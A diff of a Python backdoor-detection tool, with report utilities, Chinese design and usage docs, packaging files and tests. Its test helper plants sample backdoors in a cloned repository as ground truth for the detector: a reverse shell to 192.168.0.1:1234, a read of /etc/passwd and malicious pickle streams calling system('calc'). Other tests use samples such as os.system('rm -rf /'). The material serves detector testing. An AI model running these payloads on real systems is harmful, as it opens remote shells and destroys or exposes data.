    title = Paragraph("Vulnerability Report", title_style)
    story.append(title)

    # Normal body text style
    normal_style = ParagraphStyle(
        "BodyText", parent=styles["BodyText"], fontSize=12, leading=15, spaceAfter=12
    )

    # Add the vulnerability details
    for line in data.split("\n"):
        if line.strip():  # Skip empty lines
            story.append(Paragraph(line, normal_style))

    doc.build(story)
|
||||
|
||||
|
||||
def save_as_markdown(output_path: str, data: str):
    """Write *data* to *output_path* under a Markdown report heading."""
    with open(output_path, "w") as fh:
        fh.write("## Vulnerability Report: \n\n" + data)
|
||||
|
||||
|
||||
def save_as_txt(output_path: str, data: str):
    """Write *data* to *output_path* under a plain-text report heading."""
    with open(output_path, "w") as fh:
        fh.write("Vulnerability Report: \n\n" + data)
|
||||
|
||||
|
||||
def print_separator(title, char="-", length=50, padding=2):
    """Print *title* centered, then a separator line built from *char*."""
    width = length + 4 * padding
    print(f"{title:^{width}}")  # centered title with padding on both sides
    print(char * (length + 2 * padding))  # separator line
|
||||
|
||||
|
||||
def modify_file_name(file_path: str) -> str:
    """
    Modify the file name by adding '-re' before the file extension.

    Args:
        file_path (str): The original file path.

    Returns:
        str: The modified file path.
    """
    directory, base = os.path.split(file_path)
    stem, ext = os.path.splitext(base)
    return os.path.join(directory, f"{stem}-re{ext}")
|
||||
|
||||
|
||||
def requirement_detection(requirement_path, output_path=None):
    """Scan a requirements file against Snyk and report the findings.

    With *output_path*, results go to a '-re'-suffixed sibling file;
    otherwise they are printed to the terminal.
    """
    base_url = "https://security.snyk.io/package/pip/"
    findings = check_vulnerabilities(load_requirements(requirement_path), base_url)
    if output_path is None:
        print_separator("\nVulnerability Report", "=", 40, 5)
        print(findings)
    else:
        new_path = modify_file_name(output_path)
        save_to_file(new_path, findings)
        print(f"Vulnerability scan complete. Results saved to {output_path}")
        print(f"Requirements scan complete. Results saved to {new_path}")
|
||||
24
detection/utils.py
Normal file
24
detection/utils.py
Normal file
@@ -0,0 +1,24 @@
|
||||
import re
|
||||
import sys
|
||||
|
||||
|
||||
def read_file_content(file_path: str) -> str:
    """Return the whole file as text (UTF-8, undecodable bytes ignored).

    Exits with status 1 when the file is missing or unreadable.
    """
    try:
        with open(file_path, "r", encoding="utf-8", errors="ignore") as fh:
            return fh.read()
    except FileNotFoundError:
        print("Error: File not found.")
        sys.exit(1)
    except IOError:
        print("Error: Could not read file.")
        sys.exit(1)
|
||||
|
||||
|
||||
def remove_comments(code: str, extension: str) -> str:
    """Strip comments from *code* according to the file *extension*.

    .py removes '#' comments line by line; .js/.cpp remove // and /* */
    comments. NOTE: comment markers inside string literals are also
    stripped — acceptable for this scanner's heuristic purposes.
    """
    if extension == ".py":
        # BUG FIX: the original did code.split("#")[0], which truncated the
        # ENTIRE remaining text at the first '#' anywhere — all code after
        # the first comment was silently dropped. Strip per line instead.
        stripped = [line.split("#", 1)[0].rstrip() for line in code.splitlines()]
        return "\n".join(stripped).strip()
    elif extension in {".js", ".cpp"}:
        code = re.sub(r"//.*", "", code)
        code = re.sub(r"/\*.*?\*/", "", code, flags=re.DOTALL)
        return code.strip()
    return code.strip()
|
||||
21
docs/README.md
Normal file
21
docs/README.md
Normal file
@@ -0,0 +1,21 @@
|
||||
# 项目文档
|
||||
|
||||
此目录用于记录本项目的各类文档,如用法文档、思路文档、技术文档等。
|
||||
|
||||
## 文件结构
|
||||
|
||||
- **usage.md**: 该文件包含了项目的使用文档,详细说明了如何安装、配置和使用本项目。
|
||||
- **design.md**: 该文件记录了项目的设计思路,包括架构设计、模块划分等内容。
|
||||
- **tech_notes.md**: 该文件包含了技术文档,记录了项目中涉及的技术细节、解决方案和实现方法等。
|
||||
|
||||
## 使用方法
|
||||
|
||||
请参阅 **[usage.md](./usage.md)** 获取关于如何使用本项目的详细信息。
|
||||
|
||||
## 设计思路
|
||||
|
||||
初步的实现方案记录在 **[idea.md](./idea.md)** 文件中,实际采用的详细设计思路记录在 **[design.md](./design.md)** 文件中。
|
||||
|
||||
## 技术文档
|
||||
|
||||
项目的技术文档可以在 **[tech_notes.md](./tech_notes.md)** 中找到,其中包含了项目中所用技术的详细说明和相关资料。
|
||||
136
docs/design.md
Normal file
136
docs/design.md
Normal file
@@ -0,0 +1,136 @@
|
||||
# 项目设计文档 - 后门检测系统
|
||||
|
||||
## 打包
|
||||
|
||||
### 简介
|
||||
|
||||
本项目需要将 Python 代码打包成`pip`包和`deb`包,以便于分发和安装。以下是如何实现和使用该打包功能的详细步骤。
|
||||
|
||||
### pip
|
||||
|
||||
#### 打包命令
|
||||
|
||||
```bash
|
||||
pip install wheel
|
||||
python setup.py sdist bdist_wheel
|
||||
```
|
||||
|
||||
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
|
||||
|
||||
#### 本地安装
|
||||
|
||||
- 安装 .whl 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
|
||||
```
|
||||
|
||||
- 安装 .tar.gz 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0.tar.gz
|
||||
```
|
||||
|
||||
#### 上传到 PyPI
|
||||
|
||||
- 安装 twine:
|
||||
|
||||
``` bash
|
||||
pip install twine
|
||||
```
|
||||
|
||||
- 使用 twine 上传包到 PyPI:
|
||||
|
||||
``` bash
|
||||
twine upload dist/*
|
||||
```
|
||||
|
||||
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
|
||||
|
||||
#### 使用 PyPI 安装
|
||||
|
||||
包上传到 PyPI 后,可以通过以下命令安装:
|
||||
|
||||
``` bash
|
||||
pip install backdoor_buster
|
||||
```
|
||||
|
||||
## 静态代码后门检测
|
||||
|
||||
**功能描述**:
|
||||
这个脚本用于扫描指定路径下的代码文件,检测潜在的危险函数调用,支持 `.py`, `.js`, `.cpp`, `.pyc` 文件。
|
||||
|
||||
**主要组件**:
|
||||
|
||||
- `read_file_content(file_path)`: 读取文件内容。
|
||||
- `remove_comments(code, extension)`: 移除代码中的注释。
|
||||
- `find_dangerous_functions(file_content, file_extension)`: 检测并标记危险函数的使用与威胁等级。
|
||||
- `output_results(results, output_format, output_file)`: 输出检测结果到指定格式和路径。
|
||||
|
||||
**输入**:
|
||||
|
||||
- 代码路径(文件或目录)。
|
||||
- 输出文件路径和格式(通过命令行参数指定)。
|
||||
|
||||
**输出**:
|
||||
|
||||
- 安全分析报告,可选格式为 HTML、Markdown、TXT 或 PDF。
|
||||
|
||||
**设计考虑**:
|
||||
|
||||
- 动态识别文件类型并适应不同的注释规则。
|
||||
- 使用正则表达式检测潜在的危险函数调用。
|
||||
- 使用 ReportLab 库生成 PDF,提供丰富的文档布局。
|
||||
|
||||
**使用示例**:
|
||||
|
||||
```bash
|
||||
python backdoor_detection.py ./src -o ./output/report.pdf
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 依赖版本漏洞检测
|
||||
|
||||
**功能描述**:
|
||||
这个脚本用于检测项目依赖中是否存在已知的安全漏洞。它通过读取一个包含漏洞信息的文件和项目的 `requirements.txt`,对比确定哪些依赖项是不安全的。
|
||||
|
||||
**主要组件**:
|
||||
|
||||
- `parse_html`: 爬取网站收集的漏洞依赖信息。
|
||||
- `trans_vulnerable_packages(content)`: 将漏洞版本中的集合形式转换为大于小于的格式。
|
||||
- `load_requirements(filename)`: 从项目的 `requirements.txt` 文件中加载依赖信息。
|
||||
- `output_results(filename, results, format_type)`: 根据指定格式输出检测结果。
|
||||
- `check_vulnerabilities(requirements, vulnerabilities, output_file)`: 核心功能,对比依赖与漏洞信息并生成报告。
|
||||
- `output_results(filename, results, format_type)`: 根据用户需求设置扫描结果输出格式。
|
||||
|
||||
**输入**:
|
||||
|
||||
- 项目 `requirements.txt` 文件路径。
|
||||
- 输出文件路径和格式(通过命令行参数指定)。
|
||||
|
||||
**输出**:
|
||||
|
||||
- 报告文件,格式可以是 HTML、Markdown、TXT 或 PDF。
|
||||
|
||||
**设计考虑**:
|
||||
|
||||
- 使用 `argparse` 处理命令行输入。
|
||||
- 使用 `packaging` 库来处理和比较版本号。
|
||||
- 使用异常处理来确保文件读写操作的安全性。
|
||||
|
||||
**使用示例**:
|
||||
|
||||
```bash
|
||||
python -m detection.requirements_detection ./requirements.txt -o ./output/report.md
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### 结论
|
||||
|
||||
这两个脚本为后门检测项目提供了两个不同的安全检查角度:一个是外部依赖的安全性,另一个是内部代码潜在的安全漏洞。通过将这两种功能结合,可以提供一个全面的安全审计工具,以保障项目的安全性。
|
||||
|
||||
---
|
||||
|
||||
以上就是针对后门检测系统的项目设计文档。通过这样的设计,项目团队可以更好地了解系统的运作方式和如何使用系统进行安全检测。
|
||||
46
docs/idea.md
Normal file
46
docs/idea.md
Normal file
@@ -0,0 +1,46 @@
|
||||
# 设计方案
|
||||
|
||||
## 静态代码分析
|
||||
|
||||
检查源代码的结构、语法和意图而不执行代码。通过这种方式,可以发现安全漏洞和后门的迹象,比如隐藏的函数、异常的API调用、敏感信息的硬编码等。
|
||||
|
||||
工具开发:使用正则表达式和模式匹配来搜索代码中的可疑结构或者片段。
|
||||
|
||||
参考项目: <https://github.com/SonarSource/sonarqube>
|
||||
|
||||
检查源代码的语法和关键词。通过这种方式,可以发现是否存在与其他语言的交互,比如调用外部命令、使用其他语言的扩展模块、与其他语言的接口交互等。
|
||||
|
||||
实现方法:可以使用Python代码解析库(如ast模块)来分析语法树,并检查特定的代码模式或结构;开发脚本来搜索Python代码中常用于与其他语言交互的关键词和函数,例如ctypes、subprocess、os.system等
|
||||
|
||||
## 控制流分析
|
||||
|
||||
通过分析程序的控制流(即程序中各个操作的执行顺序),可以检测到异常的控制流路径,这些路径可能是后门的迹象。
|
||||
|
||||
实现方法:检测代码中是否含有不可达的分支,如果有,则检测是否包含恶意代码,并根据威胁程度划分危险等级。
|
||||
|
||||
## 依赖分析
|
||||
|
||||
分析代码库中的依赖关系,确保所有外部库和包都是可信的,并且没有引入可能含有后门的恶意代码。
|
||||
|
||||
实施策略:开发脚本或工具来自动化检查外部库的可信度和更新记录。
|
||||
|
||||
这个网站可以搜索依赖中是否存在漏洞: <https://security.snyk.io/package/pip/>
|
||||
|
||||
分析代码库中的依赖关系,查找是否导入了与其他语言交互相关的模块或库
|
||||
|
||||
实施策略:开发脚本进行依赖库对比匹配
|
||||
|
||||
## 异常行为检测
|
||||
|
||||
通过定义“正常”代码行为的基线,可以标识出异常行为,这些异常行为可能指示着后门的存在。
|
||||
|
||||
行为模型:创建机器学习模型来学习代码的正常模式和行为,然后识别偏离这些模式的行为。
|
||||
|
||||
## 基于NLP的后门检测
|
||||
|
||||
使用NLP技术来训练机器学习模型,以自动从大量代码中学习和识别异常或潜在的后门模式。
|
||||
|
||||
开发方法:采用深度学习框架如TensorFlow或PyTorch,结合NLP处理工具,训练模型识别代码中的异常行为。
|
||||
|
||||
|
||||
|
||||
68
docs/tech_notes.md
Normal file
68
docs/tech_notes.md
Normal file
@@ -0,0 +1,68 @@
|
||||
# 技术说明文档 - 后门检测系统
|
||||
|
||||
本文档详细说明了后门检测系统中使用的技术和库,以及这些技术的应用方式和原理。
|
||||
|
||||
## 1. Python 编程语言
|
||||
|
||||
本项目主要使用 Python 编程语言编写。Python 是一种解释型、高级和通用的编程语言。Python 的设计哲学强调代码的可读性和简洁的语法(尤其是使用空格缩进划分代码块,而非使用大括号或关键字)。详细信息可参考:[Python 官网](https://www.python.org/)
|
||||
|
||||
## 2. `packaging` 库
|
||||
|
||||
`packaging` 库提供了版本号解析和比较的功能,非常适合用于处理和比较软件包的版本号。在本项目中,它被用来解析 `requirements.txt` 文件中的依赖版本,并与已知的漏洞版本进行比较,以判断是否存在安全风险。
|
||||
|
||||
- **主要应用**:比较依赖包版本是否在漏洞版本范围内。
|
||||
- **官方文档**:[packaging on PyPI](https://pypi.org/project/packaging/)
|
||||
|
||||
## 3. `reportlab` 库
|
||||
|
||||
`reportlab` 是 Python 中强大的 PDF 生成库,允许快速创建复杂的 PDF 文档。在此项目中,`reportlab` 用于生成具有格式化文本和布局的 PDF 报告。
|
||||
|
||||
- **主要应用**:生成 PDF 格式的报告,包括带有标题、段落和间距的文档结构。
|
||||
- **官方文档**:[ReportLab User Guide](https://www.reportlab.com/docs/reportlab-user-guide.pdf)
|
||||
|
||||
## 4. `argparse` 库
|
||||
|
||||
`argparse` 库是用于解析命令行参数和选项的标准库。它让开发者能够轻松地编写用户友好的命令行接口,程序可以从 `sys.argv` 中提取出所需的命令行参数。本项目中使用 `argparse` 来接收用户指定的文件路径和输出格式。
|
||||
|
||||
- **主要应用**:解析命令行输入,获取用户指定的文件路径和输出选项。
|
||||
- **官方文档**:[argparse — Command-line option and argument parsing](https://docs.python.org/3/library/argparse.html)
|
||||
|
||||
## 5. 正则表达式 (`re` 模块)
|
||||
|
||||
正则表达式在本项目中用于从配置文件中提取出软件包名称和版本范围。`re` 模块提供了对正则表达式的全面支持,允许进行复杂的字符串搜索、匹配及替换。
|
||||
|
||||
- **主要应用**:解析和处理文本数据,特别是在加载漏洞信息和分析代码文件时用于提取特定模式的字符串。
|
||||
- **官方文档**:[re — Regular expression operations](https://docs.python.org/3/library/re.html)
|
||||
|
||||
## 6. 文件处理
|
||||
|
||||
文件的读取和写入是通过 Python 的内置功能进行的,确保了项目能够处理外部数据文件和输出结果到指定的文件中。
|
||||
|
||||
- **主要应用**:读取漏洞数据文件和依赖文件,输出结果报告到文本、Markdown、HTML 或 PDF 文件。
|
||||
|
||||
## 7. 爬虫
|
||||
|
||||
利用`python`的`BeautifulSoup`制作爬虫快速收集整理信息
|
||||
|
||||
- **主要应用**:通过爬虫收集漏洞依赖信息并进行汇总,用于判断依赖是否存在漏洞版本。
|
||||
|
||||
## 8. 打包
|
||||
|
||||
本项目支持打包作为`pip`包进行发布
|
||||
|
||||
- **主要应用**:
|
||||
- `pip`通过`wheel`并自行撰写`setup.py`以及`MANIFEST.in`,将项目打包发布
|
||||
|
||||
## 9. 反汇编
|
||||
|
||||
项目通过`uncompyle6`库提供的反汇编模块可以实现对python字节码进行反汇编之后扫描危险代码
|
||||
|
||||
## 10. 代码和风险分析
|
||||
|
||||
项目中实现了基本的静态代码分析功能,用于识别和报告潜在的安全风险函数调用,如 `system`、`exec` 等。
|
||||
|
||||
- **技术说明**:通过正则表达式匹配高风险函数的调用,评估代码文件的安全性。
|
||||
|
||||
通过这些技术的综合应用,后门检测系统能够为用户提供全面的安全检测功能,帮助识别和预防安全风险。这些技术的深入了解和正确应用是确保系统有效运行的关键。
|
||||
118
docs/usage.md
Normal file
118
docs/usage.md
Normal file
@@ -0,0 +1,118 @@
|
||||
# 使用说明文档 - 后门检测系统
|
||||
|
||||
本文档提供了后门检测系统的使用方法,包括依赖版本漏洞检测和静态代码后门检测两部分。这将帮助用户正确执行安全检测,并理解输出结果。
|
||||
|
||||
## 下载和配置
|
||||
|
||||
- 克隆或下载后门检测系统到您的本地环境。
|
||||
- 确保脚本文件 (`requirements_detection.py` 和 `backdoor_detection.py`) 在您的工作目录中。
|
||||
|
||||
## 打包
|
||||
|
||||
### pip
|
||||
|
||||
#### 打包命令
|
||||
|
||||
```bash
|
||||
pip install wheel
|
||||
python setup.py sdist bdist_wheel
|
||||
```
|
||||
|
||||
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
|
||||
|
||||
#### 本地安装
|
||||
|
||||
- 安装 .whl 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
|
||||
```
|
||||
|
||||
- 安装 .tar.gz 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0.tar.gz
|
||||
```
|
||||
|
||||
#### 上传到 PyPI
|
||||
|
||||
- 安装 twine:
|
||||
|
||||
``` bash
|
||||
pip install twine
|
||||
```
|
||||
|
||||
- 使用 twine 上传包到 PyPI:
|
||||
|
||||
``` bash
|
||||
twine upload dist/*
|
||||
```
|
||||
|
||||
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
|
||||
|
||||
#### 使用 PyPI 安装
|
||||
|
||||
包上传到 PyPI 后,可以通过以下命令安装:
|
||||
|
||||
``` bash
|
||||
pip install backdoor_buster
|
||||
```
|
||||
|
||||
## 运行依赖版本漏洞检测脚本
|
||||
|
||||
**命令格式**:
|
||||
|
||||
```bash
|
||||
python -m detection.requirements_detection <requirements_file> -o <output_file>
|
||||
```
|
||||
|
||||
**参数说明**:
|
||||
|
||||
- `<requirements_file>`: 项目的 `requirements.txt` 文件路径。
|
||||
- `<output_file>`: 指定输出结果的文件路径和格式,支持的格式有 `.txt`, `.md`, `.html`, `.pdf`。
|
||||
|
||||
**示例**:
|
||||
|
||||
```bash
|
||||
python -m detection.requirements_detection requirements.txt -o output/report.md
|
||||
```
|
||||
|
||||
## 运行静态代码后门检测脚本
|
||||
|
||||
**命令格式**:
|
||||
|
||||
```bash
|
||||
python -m detection <code_path> -o <output_file> -m <mode>
|
||||
```
|
||||
|
||||
**参数说明**:
|
||||
|
||||
- `<code_path>`: 代码文件或目录的路径。
|
||||
- `<output_file>`: 指定输出结果的文件路径和格式,支持的格式有 `.txt`, `.md`, `.html`, `.pdf`。
|
||||
- `<mode>`: 指定检测模式,目前支持的模式有 `regex` 和 `llm`。
|
||||
|
||||
**示例**:
|
||||
|
||||
```bash
|
||||
python -m detection ./src -o output/report.pdf -m regex
|
||||
```
|
||||
|
||||
## 结果解读
|
||||
|
||||
- 输出结果将根据指定的格式保存在您指定的文件中。
|
||||
- 结果中会标注出每个文件中发现的高风险和中风险函数调用位置。
|
||||
- 对于依赖检测,结果将标明每个依赖包的安全状态,包括存在安全风险的依赖及其版本。
|
||||
|
||||
## 常见问题处理
|
||||
|
||||
- 确保所有路径都正确无误,避免因路径错误导致文件读取失败。
|
||||
- 如果输出格式指定错误,系统将默认输出为 `.txt` 格式。
|
||||
- 确保安装了所有必要的依赖库,以避免运行时错误。
|
||||
|
||||
## 支持
|
||||
|
||||
如果您在使用过程中遇到任何问题,或需要进一步的技术支持,请联系开发团队或访问我们的Git仓库以获取帮助和最新信息。
|
||||
|
||||
---
|
||||
|
||||
以上是后门检测系统的使用说明文档。请按照这些步骤进行操作,以确保您能有效地使用本系统进行安全检测。
|
||||
7
requirements.txt
Normal file
7
requirements.txt
Normal file
@@ -0,0 +1,7 @@
|
||||
reportlab
|
||||
requests
|
||||
packaging
|
||||
openai
|
||||
bs4
|
||||
colorama
|
||||
tqdm
|
||||
44
setup.py
Normal file
44
setup.py
Normal file
@@ -0,0 +1,44 @@
|
||||
# pip install wheel
|
||||
# python setup.py sdist bdist_wheel
|
||||
|
||||
from setuptools import setup, find_packages
|
||||
|
||||
|
||||
def read_file(filename: str) -> str:
    """Return the entire content of a UTF-8 text file.

    Args:
        filename (str): Path of the file to read.

    Returns:
        str: The file's full text content.
    """
    with open(filename, encoding="utf-8") as handle:
        content = handle.read()
    return content
|
||||
|
||||
|
||||
# Package metadata for building and publishing the distribution.
setup(
    name="backdoor_buster",
    version="0.1.0",
    author="ciscn",
    description="A tool for integrated backdoor detection",
    # Reuse README.md as the PyPI long description.
    long_description=read_file("README.md"),
    long_description_content_type="text/markdown",
    url="https://git.mamahaha.work/sangge/BackDoorBuster",
    # Discover all packages automatically.
    packages=find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires=">=3.6",
    # Runtime dependencies; keep in sync with requirements.txt.
    install_requires=[
        "reportlab",
        "requests",
        "packaging",
        "openai",
        "bs4",
        "tqdm",
        "colorama",
    ],
)
|
||||
0
tests/__init__.py
Normal file
0
tests/__init__.py
Normal file
159
tests/final_tests_util.py
Normal file
159
tests/final_tests_util.py
Normal file
@@ -0,0 +1,159 @@
|
||||
from typing import Tuple, List
|
||||
from git import Repo # type: ignore
|
||||
import random
|
||||
from pathlib import Path
|
||||
import pickle
|
||||
import os
|
||||
import py_compile
|
||||
|
||||
|
||||
def clone_repo(repo_url: str, clone_dir: str) -> None:
    """Shallow-clone a Git repository into the given directory.

    Failures are reported on stdout rather than raised, so callers can
    proceed on a best-effort basis.

    Args:
        repo_url (str): URL of the Git repository to clone.
        clone_dir (str): Destination directory for the clone.
    """
    try:
        # depth=1: only the latest commit is needed for test fixtures.
        Repo.clone_from(repo_url, clone_dir, depth=1)
    except Exception as exc:
        print(f"Error cloning repository: {exc}")
|
||||
|
||||
|
||||
# a return type of backdoor. Include injected file name and number.
|
||||
|
||||
|
||||
def inject_random_backdoor(
    path: str, sample_rate: float = 0.1
) -> Tuple[Tuple[str, int], ...]:
    """Inject a random source-level backdoor snippet into sampled files.

    Every ``*.py`` file under *path* is independently selected with
    probability *sample_rate*; each selected file gets one randomly
    chosen snippet from the module-level ``backdoors`` list inserted at
    a random line.

    Fixes over the original: the docstring documented nonexistent
    ``pickle``/``pyc`` parameters, and the dead locals ``injectedNum``
    and ``total_lines`` are removed.

    Args:
        path (str): Root of the repository to inject backdoors into.
        sample_rate (float): Per-file probability of injection.

    Returns:
        Tuple of ``(file_path, inserted_line_index)`` pairs, one per
        injected file (the ground truth for the final tests).
    """
    project_path = Path(path)
    all_python_files = list(project_path.rglob("*.py"))
    # Sample which files will receive a backdoor.
    injected_python_files = [
        python_file
        for python_file in all_python_files
        if random.random() < sample_rate
    ]

    results: List[Tuple[str, int]] = []
    for python_file in injected_python_files:
        with open(python_file, "r+", errors="ignore") as f:
            lines = f.readlines()
            # randint is inclusive, so the snippet may land after the
            # last existing line.
            inject_line_number = random.randint(0, len(lines))
            inject_code = random.choice(backdoors)
            lines.insert(inject_line_number, inject_code + "\n")
            # Content only grows, so rewriting in place never leaves
            # stale trailing bytes.
            f.seek(0)
            f.writelines(lines)
        results.append((str(python_file), inject_line_number))

    return tuple(results)
|
||||
|
||||
|
||||
# Example 1: execute a shell command via os.system
backdoor1 = """import os
os.system('ls')"""

# Example 2: execute a command via the subprocess module
backdoor2 = """import subprocess
subprocess.call(['ls', '-l'])"""

# Example 3: open a reverse shell to a hard-coded address
backdoor3 = """import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])"""

# Example 4: run arbitrary code via eval
backdoor4 = """code = "print('Hello, World!')"
eval(code)"""

# Example 5: run arbitrary code via exec
backdoor5 = """code = '''
import os
os.system('ls')
'''
exec(code)"""


# Example 7: read and display a sensitive file
backdoor7 = """with open('/etc/passwd', 'r') as file:
    data = file.read()
    print(data)"""


# Source-level snippets used by inject_random_backdoor / inject_pyc_backdoor.
backdoors = [
    backdoor1,
    backdoor2,
    backdoor3,
    backdoor4,
    backdoor5,
    backdoor7,
]

# Raw pickle streams used by inject_pickle_backdoor; some contain REDUCE
# opcodes that would invoke nt.system on load.
backdoors_pickle = [
    b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03K\x12X\x04\x00\x00\x00nameq\x04X\x06\x00\x00\x00Pickleq\x05ub.',
    b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ub.',
    b'cnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.',
    b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ubcnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.'
]
|
||||
def inject_pickle_backdoor(root_path: str) -> int:
    """Drop malicious pickle payload files into random subdirectories.

    Bug fix: the original called ``pickle.dump(backdoor, f)``, which
    pickles the *bytes object itself* — unpickling such a file just
    returns the bytes and never executes the embedded payload.  The raw
    payload is now written directly so the file is itself a malicious
    pickle stream.  The function also now returns the number of files
    written, which ``TestFinalTests.setUp`` uses as the ground-truth
    count (it previously divided by ``None``).

    Args:
        root_path (str): Directory whose immediate subdirectories are
            candidates for injection.

    Returns:
        int: Number of backdoor ``.pickle`` files written.
    """
    all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
    # Pick a random non-empty subset of the subdirectories.
    paths = random.sample(all_path, random.randrange(1, len(all_path)))
    for path in paths:
        backdoor_id = random.randrange(0, len(backdoors_pickle))
        payload = backdoors_pickle[backdoor_id]
        filename = os.path.join(path, f"backdoor{backdoor_id}.pickle")
        with open(filename, "wb") as f:
            # Write the raw pickle stream, do NOT re-pickle it.
            f.write(payload)
    return len(paths)
|
||||
|
||||
|
||||
def inject_pyc_backdoor(root_path: str) -> int:
    """Compile backdoor snippets into ``.pyc`` files in random subdirectories.

    Fix: the function now returns the number of files written —
    ``TestFinalTests.setUp`` stores the result as ``pyc_true_num`` and
    divides by it, which previously failed because the original
    returned ``None``.

    Args:
        root_path (str): Directory whose immediate subdirectories are
            candidates for injection.

    Returns:
        int: Number of backdoor ``.pyc`` files written.
    """
    all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
    # Pick a random non-empty subset of the subdirectories.
    paths = random.sample(all_path, random.randrange(1, len(all_path)))

    for path in paths:
        backdoor_id = random.randrange(0, len(backdoors))
        backdoor = backdoors[backdoor_id]
        py_filename = os.path.join(path, f"backdoor{backdoor_id}.py")
        pyc_filename = os.path.join(path, f"backdoor{backdoor_id}.pyc")
        with open(py_filename, "w") as f:
            f.write(backdoor)

        # Compile to bytecode, then drop the source so only the .pyc remains.
        py_compile.compile(py_filename, cfile=pyc_filename)
        os.remove(py_filename)
    return len(paths)
|
||||
|
||||
|
||||
# Manual smoke test: clone a real repository and run the injection helpers.
if __name__ == "__main__":
    repo_url = "https://github.com/TheAlgorithms/Python.git"
    clone_dir = "/tmp/repo"
    clone_repo(repo_url, clone_dir)
    inject_random_backdoor(clone_dir)
    inject_pickle_backdoor(clone_dir)
|
||||
40
tests/test_CN_GPT_detection.py
Normal file
40
tests/test_CN_GPT_detection.py
Normal file
@@ -0,0 +1,40 @@
|
||||
import unittest
|
||||
import warnings
|
||||
import os
|
||||
import json
|
||||
|
||||
from detection.cngptdetection import detectGPT
|
||||
|
||||
class TestBackdoorDetection(unittest.TestCase):
    """Tests for the Baidu (CN) GPT-based risk-detection backend."""

    def test_gpt_risk_detection(self):
        # Requires live Baidu API credentials; skip otherwise.
        if os.getenv("BAIDU_API_KEY") is None or os.getenv("BAIDU_SECRET_KEY") is None:
            warnings.warn("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set, test skipped.", UserWarning)
            self.skipTest("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")

        content = """import os
os.system('rm -rf /') # high risk
exec('print("Hello")') # high risk
eval('2 + 2') # high risk
"""
        results1 = detectGPT(content)
        # detectGPT returns a JSON string keyed by risk level.
        classified_results = json.loads(results1)
        self.assertEqual(len(classified_results["high"]), 3)

    def test_gpt_no_risk_detection(self):
        # Requires live Baidu API credentials; skip otherwise.
        if os.getenv("BAIDU_API_KEY") is None or os.getenv("BAIDU_SECRET_KEY") is None:
            warnings.warn("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set, test skipped.", UserWarning)
            self.skipTest("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")

        # Benign code must yield empty result sets at every level.
        content = """a = 10
b = a + 5
print('This should not be detected as risky.')
"""
        results2 = detectGPT(content)
        classified_results = json.loads(results2)
        self.assertEqual(len(classified_results["high"]), 0)
        self.assertEqual(len(classified_results["medium"]), 0)
        self.assertEqual(len(classified_results["low"]), 0)
|
||||
|
||||
|
||||
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
||||
112
tests/test_backdoor_detection.py
Normal file
112
tests/test_backdoor_detection.py
Normal file
@@ -0,0 +1,112 @@
|
||||
import unittest
|
||||
import warnings
|
||||
|
||||
from detection.__main__ import find_dangerous_functions
|
||||
from detection.GPTdetection import detectGPT
|
||||
import os
|
||||
|
||||
|
||||
class TestBackdoorDetection(unittest.TestCase):
    """Tests for regex-based and OpenAI GPT-based dangerous-code detection."""

    def test_high_risk_detection(self):
        # os.system / exec / eval must be classified as high risk.
        content = """import os
os.system('rm -rf /') # high risk
exec('print("Hello")') # high risk
eval('2 + 2') # high risk
"""
        file_extension = ".py"
        results = find_dangerous_functions(content, file_extension)
        # Entries are (line_number, source_line_without_trailing_comment).
        self.assertIn((2, "os.system('rm -rf /')"), results["high"])
        self.assertIn((3, "exec('print(\"Hello\")')"), results["high"])
        self.assertIn((4, "eval('2 + 2')"), results["high"])

    def test_medium_risk_detection(self):
        # subprocess.run / os.popen must be classified as medium risk.
        content = """import subprocess
subprocess.run(['ls', '-l']) # medium risk
import os
os.popen('ls') # medium risk
"""
        file_extension = ".py"
        results = find_dangerous_functions(content, file_extension)
        self.assertIn((2, "subprocess.run(['ls', '-l'])"), results["medium"])
        self.assertIn((4, "os.popen('ls')"), results["medium"])

    def test_no_risk_detection(self):
        # Plain arithmetic and printing must not be flagged at any level.
        content = """a = 10
b = a + 5
print('This should not be detected as risky.')
"""
        file_extension = ".py"
        results = find_dangerous_functions(content, file_extension)
        self.assertEqual(len(results["high"]), 0)
        self.assertEqual(len(results["medium"]), 0)
        self.assertEqual(len(results["low"]), 0)

    def test_inclusion_of_comments(self):
        # Trailing comments must be stripped from the reported source line.
        content = """# Just a comment line
print('This is a safe line')
eval('2 + 2') # This should be high risk
subprocess.run(['echo', 'hello']) # This should be medium risk
"""
        file_extension = ".py"
        results = find_dangerous_functions(content, file_extension)
        self.assertIn(
